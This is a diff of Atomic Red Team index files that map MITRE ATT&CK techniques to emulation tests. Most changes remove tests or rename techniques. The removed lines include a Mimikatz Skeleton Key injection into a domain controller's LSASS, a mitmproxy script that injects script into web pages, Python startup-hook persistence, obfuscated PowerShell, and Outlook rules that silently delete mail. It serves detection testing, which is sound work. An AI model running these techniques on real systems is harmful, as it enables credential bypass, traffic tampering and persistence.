@@ -53658,21 +53334,6 @@ discovery:
x_mitre_version: '2.5'
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
description: |
List active TCP/UDP network connections using ss, with lsof as a fallback
when ss is unavailable. Serves as an alternative to the netstat-based test.
supported_platforms:
- linux
- macos
executor:
name: bash
command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
-ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
fi
'
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
description: |
@@ -63575,68 +63236,7 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
atomic_tests: []
T1078.001:
technique:
type: attack-pattern
atomics/Indexes/office-365-index.yaml
+8 -18
View File
@@ -11651,7 +11651,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11681,7 +11681,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20244,7 +20243,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20280,7 +20279,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23178,7 +23176,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23201,7 +23199,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27386,7 +27383,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27407,7 +27404,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31730,7 +31726,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31766,7 +31762,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32252,7 +32247,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32282,7 +32277,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34104,7 +34098,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34131,7 +34125,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34533,7 +34526,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44573,7 +44565,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44603,7 +44595,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56317,7 +56308,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/saas-index.yaml
+8 -18
View File
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,7 +11500,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20063,7 +20062,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20099,7 +20098,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -22946,7 +22944,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22969,7 +22967,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27154,7 +27151,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27175,7 +27172,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31498,7 +31494,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31534,7 +31530,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32020,7 +32015,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32050,7 +32045,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -33821,7 +33815,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -33848,7 +33842,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34250,7 +34243,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44152,7 +44144,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44182,7 +44174,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -55896,7 +55887,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/windows-index.yaml
+46 -1091
View File
@@ -1523,10 +1523,10 @@ defense-evasion:
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
Ignore
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
@@ -1541,12 +1541,13 @@ defense-evasion:
command: |-
$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
-ErrorAction Ignore
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
T1014:
@@ -19687,22 +19688,6 @@ defense-evasion:
'
name: command_prompt
- name: Obfuscated PowerShell Command via Character Array
auto_generated_guid: 6683baf0-6e77-4f58-b114-814184ea8150
description: "Spawns a child PowerShell process using character array obfuscation.
\nBoth the PowerShell binary name and executed command are constructed \nfrom
ASCII values at runtime to evade string-based detection.\n"
supported_platforms:
- windows
executor:
command: |
$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)
cleanup_command: |
taskkill /f /im calculator.exe >nul 2>nul
taskkill /f /im CalculatorApp.exe >nul 2>nul
name: powershell
T1556.006:
technique:
type: attack-pattern
@@ -22925,7 +22910,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -22955,54 +22940,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1027.006:
technique:
type: attack-pattern
@@ -38074,7 +38012,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -38110,99 +38048,7 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -42968,7 +42814,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -42991,7 +42837,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -50073,6 +49918,20 @@ persistence:
3. Click 'Select'
name: manual
- name: Chrome/Chromium (Chrome Web Store)
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
@@ -50183,7 +50042,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -50204,410 +50063,7 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests:
- name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
description: |
Creates a malicious Outlook rule via the COM object that permanently deletes
emails when an email with a specific subject keyword arrives. Simulates
adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
action as it does not require a resolved Exchange folder unlike MoveToFolder.
NOTE: olRuleActionStartApplication cannot be created programmatically per
Microsoft's Rules object model - DeletePermanently is used as the supported
equivalent that generates the same rule-creation artefact.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the malicious Outlook rule
type: string
default: AtomicTest_T1137005_SubjectTrigger
trigger_subject:
description: Email subject keyword that triggers the rule
type: string
default: atomic-rt-trigger
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$cond = $rule.Conditions.Subject
$cond.Enabled = $true
$cond.Text = @("#{trigger_subject}")
$action = $rule.Actions.DeletePermanently
$action.Enabled = $true
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via
COM Object
auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
description: |
Creates an Outlook rule via COM that permanently deletes emails received
from a specific sender address. Adversaries use sender-based triggers to
make rules appear more legitimate (e.g. disguised as a filter for a
specific colleague). Tests a different rule condition path through the
COM object model. Uses DeletePermanently as it does not require a resolved
Exchange folder unlike MoveToFolder.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the malicious Outlook rule
type: string
default: AtomicTest_T1137005_SenderTrigger
trigger_sender:
description: Sender email address that triggers the rule
type: string
default: atomictest@redteam.local
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
